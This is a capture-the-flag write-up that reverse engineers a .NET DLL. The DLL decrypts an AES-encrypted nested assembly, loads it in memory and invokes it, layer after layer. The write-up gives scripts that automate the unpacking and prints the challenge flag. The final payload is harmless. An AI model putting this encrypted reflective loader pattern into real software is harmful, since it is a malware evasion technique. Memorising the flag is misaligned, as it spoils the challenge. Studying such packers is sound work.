AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAPwAAAAAAAAAAAAAAAAAAAQABAAAAMAAAPwAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAAA/AgAAAAAAAAAAAAA/AjQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAPwQ/PwAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAAD8EIAIAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAPwEAAAEAMAAwADAAMAAwADQAYgAwAAAANAANCgABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAaAB3AF8AbgBlAHQANgAuADAAAAA8AA0KAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAGgAdwBfAG4AZQB0ADYALgAwAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAAPAAOAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABoAHcAXwBuAGUAdAA2AC4AMAAuAGQAbABsAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAAEQADgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABoAHcAXwBuAGUAdAA2AC4AMAAuAGQAbABsAAAANAANCgABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAaAB3AF8AbgBlAHQANgAuADAAAAAwAAYAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAABw3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0K");
		byte[] key = new byte[32]
		{
			75, 51, 238, 229, 103, 150, 200, 137, 20, 150,
			126, 246, 211, 224, 45, 68, 167, 240, 234, 250,
			75, 59, 126, 168, 4, 37, 252, 4, 146, 4,
			102, 102
		};
		aes.Key = key;
		try
		{
			aes.Padding = PaddingMode.ISO10126;
			int num3 = Convert.ToInt32(value);
			num3++;
			if (num3 % 4 == 1)
			{
				return;
			}
		}
		catch
		{
			aes.IV = iV;
			}
		ICryptoTransform cryptoTransform = aes.CreateDecryptor();
		array2 = new byte[3185680]
		{
			93, 212, 70, 17, 222, 77, 122, 106, 134, 126,
            ...
			4, 13, 9, 210, 47, 119, 4, 17, 109, 29
		};
		Assembly assembly = Assembly.Load(cryptoTransform.TransformFinalBlock(array2, 0, array2.Length));
		Type type = assembly.GetType("TOpeUzKRdlVkUernmEtHHRK");
		if (type != null)
		{
			MethodInfo method = type.GetMethod("JAqhOztLAsrIqTWzIsZlDVoL");
																																																																																											if (method != null && type != null)
			{
				method.Invoke(type, null);
			}
																																																												}
	}
}

This DLL self contains an AES encrypted payload.
This payload is decrypted using a key and an IV, both of which are embedded within the DLL.
The decrypted payload appears to be the bytes of a .NET executable, as it is loaded by Assembly.Load.

To extract the .NET executable, we can modify the code to save the data instead of loading it.

Once the .NET executable is obtained, we can decompile it again and observe that:

it’s almost identical as the previous code;
the encrypted data, key and IV are different;
most importantly, the encrypted data size is smaller than the previous one.

It seems that DLLception.dll contains the original code, which is encrypted and then embedded within itself multiple times.

Solution

To retrieve the original code, we need to repeat the decryption and decompilation steps until the process is complete. Instead of doing this manually (as I initially did), we can automate it.

1. Decompilation

Instead of loading the executable in dnSpy or dotPeek and exporting the disassembled code manually, we can automate the process programmatically using ICSharpCode.Decompiler:

Code generated with ChatGPT:

        
      
using System;
using System.IO;
using ICSharpCode.Decompiler;
using ICSharpCode.Decompiler.CSharp;
using ICSharpCode.Decompiler.Metadata;

class Decompiler
{
    static void Main(string[] args)
    {
        // Check if the correct number of arguments are passed
        if (args.Length != 2)
        {
            Console.WriteLine("Usage: Decompiler <dllPath> <outputPath>");
            return;
        }

        string dllPath = args[0];   // First argument: Path to the DLL
        string outputPath = args[1]; // Second argument: Path to save the output C# code

        try
        {
            // Check if the DLL file exists
            if (!File.Exists(dllPath))
            {
                Console.WriteLine($"Error: The specified DLL file does not exist: {dllPath}");
                return;
            }

            // Load the DLL
            var assemblyFile = new PEFile(dllPath);
            
            // Create a C# decompiler
            var decompiler = new CSharpDecompiler(dllPath, new DecompilerSettings());

            // Decompile the entire DLL into C# code
            string code = decompiler.DecompileWholeModuleAsString();

            // Save the decompiled code to a file
            File.WriteAllText(outputPath, code);

            Console.WriteLine("Decompilation successful! C# code saved to: " + outputPath);
        }
        catch (Exception ex)
        {
            Console.WriteLine("Error during decompilation: " + ex.Message);
        }
    }
}

Build instruction:

        
      
$ dotnet new console -n Decompiler
$ dotnet add package ICSharpCode.Decompiler
$ dotnet publish -c Release -r linux-x64 --self-contained true -p:PublishSingleFile=true

Decompiler (linux-x64)

2. Patch the code

Next, we need to modify the code to store the .NET executable instead of loading it, allowing us to decompile it in the next step.

Below is the complete code (covering decompilation, code patching, and retrieving the new executable):

        
      
import os

def unwrap():
    # Decompile
    os.system("./Decompiler dll.dll dll.cs")

    # Patch the code
    f = open("dll.cs", "r")
    lines = f.readlines()
    f.close()

    new = ["using System.IO;\n"]
    for line in lines:
        if "Thread.Sleep(0);" in line:
            continue
        elif "[assembly:" in line:
            continue
        elif "public static void" in line:
            new.append('\tpublic static void Main()\n')
        elif "Assembly assembly" in line:
            new.append('\t\tFile.WriteAllBytes("dll.dll", cryptoTransform.TransformFinalBlock(array2, 0, array2.Length));\n')
        elif "Type type" in line:
            new.append("\t\tType type = null;\n")
        else:
            new.append(line)

    g = open("dll.cs", "w")
    g.write("".join(new))
    g.close()

    # Run the patched code to get a new .NET executable
    os.system("mcs -out:dll.exe dll.cs && mono dll.exe")

while True:
    unwrap()

3. Original code

After a while, we finally get the original code:

        
      
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.Versioning;
using System.Threading;

[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default | DebuggableAttribute.DebuggingModes.DisableOptimizations | DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints | DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
[assembly: TargetFramework(".NETCoreApp,Version=v6.0", FrameworkDisplayName = ".NET 6.0")]
[assembly: AssemblyCompany("dll")]
[assembly: AssemblyConfiguration("Debug")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyInformationalVersion("1.0.0")]
[assembly: AssemblyProduct("dll")]
[assembly: AssemblyTitle("dll")]
[assembly: TargetPlatform("Windows7.0")]
[assembly: SupportedOSPlatform("Windows7.0")]
[assembly: AssemblyVersion("1.0.0.0")]
public class Program
{
    public static void Main()
    {
        char[] array = new char[56]
        {
            'H', 'A', 'C', 'K', 'D', 'A', 'Y', '{', 'd', 'l',
            'l', 'C', 'e', 'p', 't', 'i', 'o', 'n', '-', 'b',
            'e', '9', '7', '4', '6', 'f', 'a', '-', 'd', '0',
            'f', '7', '-', '4', '7', '6', '1', '-', 'a', '5',
            'b', 'a', '-', '0', 'e', '4', '6', '1', 'a', '1',
            '6', '2', '8', '7', '7', '}'
        };
        Thread.Sleep(1);
        for (int i = 0; i < array.Length; i++)
        {
            array[i] ^= array[i];
        }
        Console.WriteLine("Hello, World!");
    }
}

The flag is visible in plaintext within the array: HACKDAY{dllCeption-be9746fa-d0f7-4761-a5ba-0e461a162877}.

Writeups, HackDay 2025 - Qualifications

Reverse engineering .NET

This post is licensed under CC BY 4.0 by the author.